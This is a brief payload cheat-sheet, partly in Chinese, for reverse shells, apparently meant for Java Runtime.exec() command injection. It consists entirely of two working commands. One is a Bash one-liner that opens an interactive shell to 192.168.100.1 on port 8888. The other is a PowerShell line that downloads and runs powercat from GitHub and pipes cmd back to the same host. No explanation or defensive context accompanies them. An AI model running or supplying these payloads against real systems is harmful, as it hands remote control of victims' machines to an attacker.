Reverse Shell
java.lang.Runtime.exec() Payload
Bash反弹命令:
bash -i >& /dev/tcp/192.168.100.1/8888 0>&1
PowerShell反弹命令:powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.100.1 -p 8888 -e cmd